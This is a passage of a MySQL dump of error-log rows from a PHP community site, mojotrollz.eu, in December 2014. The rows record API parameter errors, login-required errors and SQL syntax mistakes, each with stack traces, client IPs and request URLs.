`http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (789, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418674515293', '8e8a76601023185d2260f426354cfb1d227a5dcb', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '93.204.70.97', 0.004, '2014-12-15 21:15:36', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418674515293', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (791, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 4; statics: 0; req_command: 1; req_param: 1; opt_param: 1; url: /web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418738969567', '72259960fe6e8e21896ed6ceafdf1831b7d15200', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '93.204.70.97', 0.008, '2014-12-16 15:09:38', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=sys&id=system.js&_=1418738969567', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (792, 'ERROR', 'You need to be logged in to view this ressource.', 'ce1bcbc4e2e244f775aa9a8fc9de471d0b058843', 1, '/home/web/webdir/mojotrollz/mojotrollz/page/page_mojotrollz.php', 71, '#0 [internal function]: page_mojotrollz::page_user_achievements_menu()\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/index.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'page_mojotrollz\', Array, 1, false, true)\n#3 {main}', '93.204.70.97', 0.004, '2014-12-16 15:39:49', 'mojotrollz.eu', 80, '/web/mojotrollz/?page=user_achievements_menu&', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (794, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 12; statics: 0; req_command: 1; req_param: 0; opt_param: 0; url: /web/mojotrollz/api.php?call=topic_create&parent_type=1&parent_id=1&relationflag=undefined&title=function%20(e){var%20n,r,i,o=this[0];{if(arguments.length)return%20i=b.isFunction(e),this.each(function(n){var%20o,a=b(this);1===this.nodeType&&(o=i?e.call(this,n,a.val()):e,null==o?o=%22%22:%22number%22==typeof%20o?o+=%22%22:b.isArray(o)&&(o=b.map(o,function(e){return%20null==e?%22%22:e+%22%22})),r=b.valHooks[this.type]||b.valHooks[this.nodeName.toLowerCase()],r&&%22set%22in%20r&&r.set(this,o,%22value%22)!==t||(this.value=o))});if(o)return%20r=b.valHooks[o.type]||b.valHooks[o.nodeName.toLowerCase()],r&&%22get%22in%20r&&(n=r.get(o,%22value%22))!==t?n:(n=o.value,%22string%22==typeof%20n?n.replace(U,%22%22):null==n?%22%22:n)}}&text=function%20(e){var%20n,r,i,o=this[0];{if(arguments.length)return%20i=b.isFunction(e),this.each(function(n){var%20o,a=b(this);1===this.nodeType&&(o=i?e.call(this,n,a.val()):e,null==o?o=%22%22:%22number%22==typeof%20o?o+=%22%22:b.isArray(o)&&(o=b.map(o,function(e){return%20null==e?%22%22:e+%22%22})),r=b.valHooks[this.type]||b.valHooks[this.nodeName.toLowerCase()],r&&%22set%22in%20r&&r.set(this,o,%22value%22)!==t||(this.value=o))});if(o)return%20r=b.valHooks[o.type]||b.valHooks[o.nodeName.toLowerCase()],r&&%22get%22in%20r&&(n=r.get(o,%22value%22))!==t?n:(n=o.value,%22string%22==typeof%20n?n.replace(U,%22%22):null==n?%22%22:n)}}&link=function%20(e){var%20n,r,i,o=this[0];{if(arguments.length)return%20i=b.isFunction(e),this.each(function(n){var%20o,a=b(this);1===this.nodeType&&(o=i?e.call(this,n,a.val()):e,null==o?o=%22%22:%22number%22==typeof%20o?o+=%22%22:b.isArray(o)&&(o=b.map(o,function(e){return%20null==e?%22%22:e+%22%22})),r=b.valHooks[this.type]||b.valHooks[this.nodeName.toLowerCase()],r&&%22set%22in%20r&&r.set(this,o,%22value%22)!==t||(this.value=o))});if(o)return%20r=b.valHooks[o.type]||b.valHooks[o.nodeName.toLowerCase()],r&&%22get%22in%20r&&(n=r.get(o,%22value%22))!==t?n:(n=o.value,%22string%22==typeof%20n?n.replace(U,%22%22):null==n?%22%22:n)}}', '89d412b6fc55abc1380c8c37fb9d20274411faa3', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '37.24.148.242', 0.008, '2014-12-18 22:53:32', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=topic_create&parent_type=1&parent_id=1&relationflag=undefined&title=function%20(e){var%20n,r,i,o=this[0];{if(arguments.length)return%20i=b.isFunction(e),this.each(function(n){var%20o,a=b(this);1===this.nodeType&&(o=i?e.call(th', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 11, b'0', 0, 6, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (795, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 7; statics: 0; req_command: 1; req_param: 0; opt_param: 0; url: /web/mojotrollz/api.php?call=topic_create&parent_type=1&parent_id=1&relationflag=undefined&title=&text=undefined&link=', '2e526513619965e44242f4e192bdb40158d63a00', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '37.24.148.242', 0.008, '2014-12-18 22:55:25', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=topic_create&parent_type=1&parent_id=1&relationflag=undefined&title=&text=undefined&link=', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (796, 'SYSTEM\\LOG\\ERROR', 'Unhandled or misshandled parameters - api query is invalid; given: 7; statics: 0; req_command: 1; req_param: 0; opt_param: 0; url: /web/mojotrollz/api.php?call=topic_create&parent_type=1&parent_id=1&relationflag=undefined&title=fghjk&text=undefined&link=dfghjk', '528222e7da7daddf79ca78de66d1089d591eb828', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 107, '#0 /home/web/webdir/mojotrollz/system/api/api.php(46): SYSTEM\\API\\api::do_strict(true, Array, Array, Array, Array, Array)\n#1 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#2 {main}', '37.24.148.242', 0.008, '2014-12-18 22:55:58', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=topic_create&parent_type=1&parent_id=1&relationflag=undefined&title=fghjk&text=undefined&link=dfghjk', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (797, 'ERROR', 'You need to be logged in to view this ressource.', 'ce1bcbc4e2e244f775aa9a8fc9de471d0b058843', 1, '/home/web/webdir/mojotrollz/mojotrollz/page/page_mojotrollz.php', 60, '#0 [internal function]: page_mojotrollz::page_user_nexus_menu_sub(\'1\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/index.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'page_mojotrollz\', Array, 1, false, true)\n#3 {main}', '37.24.148.242', 0.08, '2014-12-19 02:39:02', 'mojotrollz.eu', 80, '/web/mojotrollz/?page=user_nexus_menu_sub&menu=1&', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 0, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (798, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'by = ? ORDER BY timestamp DESC\' at line 1', '220580d338ed19cb3b85fdc8b03541e60511d363', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(43): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT * FROM m...\')\n#1 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(14): SYSTEM\\DB\\Connection->query(\'SELECT * FROM m...\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/page/user_nexus_menu_sub/user_nexus_menu_sub.php(19): SYSTEM\\DB\\QQ::QQ(Array)\n#3 /home/web/webdir/mojotrollz/index.php(12): user_nexus_menu_sub->html()\n#4 {main}', '37.24.148.242', 0.032, '2014-12-18 23:18:01', 'mojotrollz.eu', 80, '/web/mojotrollz/?page=user_nexus_menu_sub&menu=1&', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 11, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (799, 'ERROR', 'You need to be logged in to view this ressource.', 'ce1bcbc4e2e244f775aa9a8fc9de471d0b058843', 1, '/home/web/webdir/mojotrollz/mojotrollz/page/page_mojotrollz.php', 73, '#0 [internal function]: page_mojotrollz::page_user_achievements_menu()\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/index.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'page_mojotrollz\', Array, 1, false, true)\n#3 {main}', '37.24.148.242', 0.008, '2014-12-19 00:56:04', 'mojotrollz.eu', 80, '/web/mojotrollz/?page=user_achievements_menu&', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (800, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: Unknown column \'timestamp\' in \'order clause\'', '58fdca543ce0277507fee54ef416c6961b8a4302', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(43): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT * FROM m...\')\n#1 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(14): SYSTEM\\DB\\Connection->query(\'SELECT * FROM m...\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/page/user_nexus_content/user_nexus_content.php(26): SYSTEM\\DB\\QQ::QQ(Array)\n#3 /home/web/webdir/mojotrollz/mojotrollz/page/user_nexus_content/user_nexus_content.php(43): user_nexus_content->menu_new()\n#4 /home/web/webdir/mojotrollz/index.php(12): user_nexus_content->html()\n#5 {main}', '37.24.148.242', 0.008, '2014-12-19 01:33:23', 'mojotrollz.eu', 80, '/web/mojotrollz/?page=user_nexus_content&menu=1&filter=2', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 11, b'0', 0, 4, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (801, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'.id\r\n WHERE table = 7 and id = 1\' at line 3', 'e99354ff73d3434984e1b107a3f0117f5838941e', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(43): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT * FROM m...\')\n#1 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(14): SYSTEM\\DB\\Connection->query(\'SELECT * FROM m...\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/page/user_nexus_content/user_nexus_content.php(26): SYSTEM\\DB\\QQ::QQ(Array)\n#3 /home/web/webdir/mojotrollz/mojotrollz/page/user_nexus_content/user_nexus_content.php(43): user_nexus_content->menu_new()\n#4 /home/web/webdir/mojotrollz/index.php(12): user_nexus_content->html()\n#5 {main}', '37.24.148.242', 0.008, '2014-12-19 01:43:31', 'www.mojotrollz.eu', 80, '/web/mojotrollz/?page=user_nexus_content&menu=1&filter=2', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 11, b'0', 0, 4, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (802, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'.id WHERE table = 7 and id = 1\' at line 1', '6af04ad3d9333efd7561b4cc5f6e9ee7b7b82d6e', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(43): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT * FROM m...\')\n#1 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(14): SYSTEM\\DB\\Connection->query(\'SELECT * FROM m...\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/page/user_nexus_content/user_nexus_content.php(26): SYSTEM\\DB\\QQ::QQ(Array)\n#3 /home/web/webdir/mojotrollz/mojotrollz/page/user_nexus_content/user_nexus_content.php(43): user_nexus_content->menu_new()\n#4 /home/web/webdir/mojotrollz/index.php(12): user_nexus_content->html()\n#5 {main}', '37.24.148.242', 0.008, '2014-12-19 01:46:21', 'www.mojotrollz.eu', 80, '/web/mojotrollz/?page=user_nexus_content&menu=1&filter=2', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 11, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (803, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'.`id` WHERE `table` = 7 and `id` = 1\' at line 1', 'f9fd7eb05dd834948a6e0eaa32bb23c18d27b635', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(43): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT * FROM m...\')\n#1 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(14): SYSTEM\\DB\\Connection->query(\'SELECT * FROM m...\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/page/user_nexus_content/user_nexus_content.php(26): SYSTEM\\DB\\QQ::QQ(Array)\n#3 /home/web/webdir/mojotrollz/mojotrollz/page/user_nexus_content/user_nexus_content.php(43): user_nexus_content->menu_new()\n#4 /home/web/webdir/mojotrollz/index.php(12): user_nexus_content->html()\n#5 {main}', '37.24.148.242', 0.008, '2014-12-19 01:50:31', 'www.mojotrollz.eu', 80, '/web/mojotrollz/?page=user_nexus_content&menu=1&filter=2', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 11, b'0', 0, 8, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (804, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'.id WHERE `table` = 7 and `id` = 1\' at line 1', '0eae7f51ee78b82d16e0359cab0b0f3b8b81579d', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(43): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT * FROM m...\')\n#1 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(14): SYSTEM\\DB\\Connection->query(\'SELECT * FROM m...\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/page/user_nexus_content/user_nexus_content.php(26): SYSTEM\\DB\\QQ::QQ(Array)\n#3 /home/web/webdir/mojotrollz/mojotrollz/page/user_nexus_content/user_nexus_content.php(43): user_nexus_content->menu_new()\n#4 /home/web/webdir/mojotrollz/index.php(12): user_nexus_content->html()\n#5 {main}', '37.24.148.242', 0.012, '2014-12-19 02:08:57', 'www.mojotrollz.eu', 80, '/web/mojotrollz/?page=user_nexus_content&menu=1&filter=2', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 11, b'0', 0, 8, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (805, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'LEFT JOIN mojotrollz_tags_type ON mojotrollz_tags.type=mojotrollz_tags_type.`id`\' at line 1', '9170b5ed2ac0c8ab2719d4dc7fded73c88084a57', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(43): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT * FROM m...\')\n#1 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(14): SYSTEM\\DB\\Connection->query(\'SELECT * FROM m...\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/page/user_nexus_content/user_nexus_content.php(26): SYSTEM\\DB\\QQ::QQ(Array)\n#3 /home/web/webdir/mojotrollz/mojotrollz/page/user_nexus_content/user_nexus_content.php(43): user_nexus_content->menu_new()\n#4 /home/web/webdir/mojotrollz/index.php(12): user_nexus_content->html()\n#5 {main}', '37.24.148.242', 0.016, '2014-12-19 02:06:35', 'www.mojotrollz.eu', 80, '/web/mojotrollz/?page=user_nexus_content&menu=1&filter=2', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 11, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (806, 'ERROR', 'You need to be logged in to view this ressource.', 'ce1bcbc4e2e244f775aa9a8fc9de471d0b058843', 1, '/home/web/webdir/mojotrollz/mojotrollz/page/page_mojotrollz.php', 64, '#0 [internal function]: page_mojotrollz::page_user_nexus_content(\'1\', \'2\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/index.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'page_mojotrollz\', Array, 1, false, true)\n#3 {main}', '37.24.148.242', 0.008, '2014-12-19 02:09:45', 'www.mojotrollz.eu', 80, '/web/mojotrollz/?page=user_nexus_content&menu=1&filter=2', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (807, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: Column \'table\' in where clause is ambiguous', 'ee6ca7e2c083a367f1882395802e06f1c2d0ef04', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(43): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT * FROM m...\')\n#1 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(14): SYSTEM\\DB\\Connection->query(\'SELECT * FROM m...\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/page/user_nexus_content/user_nexus_content.php(26): SYSTEM\\DB\\QQ::QQ(Array)\n#3 /home/web/webdir/mojotrollz/mojotrollz/page/user_nexus_content/user_nexus_content.php(43): user_nexus_content->menu_new()\n#4 /home/web/webdir/mojotrollz/index.php(12): user_nexus_content->html()\n#5 {main}', '37.24.148.242', 0.008, '2014-12-19 02:09:54', 'www.mojotrollz.eu', 80, '/web/mojotrollz/?page=user_nexus_content&menu=1&filter=2', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 11, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (808, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: Column \'id\' in where clause is ambiguous', '1c667ef1756217360749a595aed98876e80e5f73', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(43): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT * FROM m...\')\n#1 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(14): SYSTEM\\DB\\Connection->query(\'SELECT * FROM m...\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/page/user_nexus_content/user_nexus_content.php(26): SYSTEM\\DB\\QQ::QQ(Array)\n#3 /home/web/webdir/mojotrollz/mojotrollz/page/user_nexus_content/user_nexus_content.php(43): user_nexus_content->menu_new()\n#4 /home/web/webdir/mojotrollz/index.php(12): user_nexus_content->html()\n#5 {main}', '37.24.148.242', 0.008, '2014-12-19 02:10:17', 'www.mojotrollz.eu', 80, '/web/mojotrollz/?page=user_nexus_content&menu=1&filter=2', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 11, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (809, 'SYSTEM\\LOG\\ERROR', 'Class not found: DBD\\GET_TOPICS_BY_TAG_FAQ', '54efcab34a90fcc5675f432f9c618c73815920c5', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'DBD\\\\GET_TOPICS_...\')\n#1 /home/web/webdir/mojotrollz/mojotrollz/page/user_nexus_menu_sub/user_nexus_menu_sub.php(26): spl_autoload_call(\'DBD\\\\GET_TOPICS_...\')\n#2 /home/web/webdir/mojotrollz/index.php(12): 